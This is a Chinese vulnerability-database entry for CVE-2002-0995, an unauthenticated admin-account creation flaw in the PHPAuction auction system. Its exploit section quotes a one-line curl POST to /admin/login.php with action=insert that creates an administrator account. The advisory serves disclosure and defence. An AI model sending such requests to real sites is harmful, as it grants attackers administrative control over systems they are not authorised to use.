PHPAuction未授权远程管理接口访问漏洞-安全小百科

PHPAuction未授权远程管理接口访问漏洞

漏洞ID	1106828	漏洞类型	未知
发布时间	2002-07-02	更新时间	2005-10-12
CVE编号	CVE-2002-0995	CNNVD-ID	CNNVD-200210-170
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/21590
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-170

|漏洞详情

PhpAuction是一款免费开放源代码的基于WEB的拍卖系统，使用PHP+MYSQL实现。PHPAuction中的login.php对用户提交的URL请求缺少正确判断，远程攻击者可以利用这个漏洞建立管理员权限的用户帐户。PHPAuction中的/admin/login.php脚本只检查$action是否设置为”insert”，如果是的情况下，就直接转向在管理员用户表中插入用户名和密码操作，攻击者可以提交非法URL请求导致在系统中增加具有管理员权限的帐户。

|漏洞EXP

source: http://www.securityfocus.com/bid/5141/info

PhpAuction is a freely available web-based auction system. It is written using PHP scripting language on a MySQL database engine.

A flaw in /admin/login.php has been reported in PHPAuction, which could allow users to gain escalated privileges.

Submitting authentication credentials via login.php will create the user account with adminsitrative permissions. 

curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"

|参考资料

来源:BID
名称:5141
链接:http://www.securityfocus.com/bid/5141
来源:www.phpauction.org
链接:http://www.phpauction.org/viewnew.php?id=5
来源:XF
名称:phpauction-admin-account-creation(9462)
链接:http://www.iss.net/security_center/static/9462.php
来源:BUGTRAQ
名称:20020702PHPAuctionbug
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0014.html

相关推荐: Cedric Email Reader Skin Configuration Script Remote File Include Vulnerability

Cedric Email Reader Skin Configuration Script Remote File Include Vulnerability 漏洞ID 1100820 漏洞类型 Configuration Error 发布时间 2003-02…

文章版权归作者所有，未经允许请勿转载。

THE END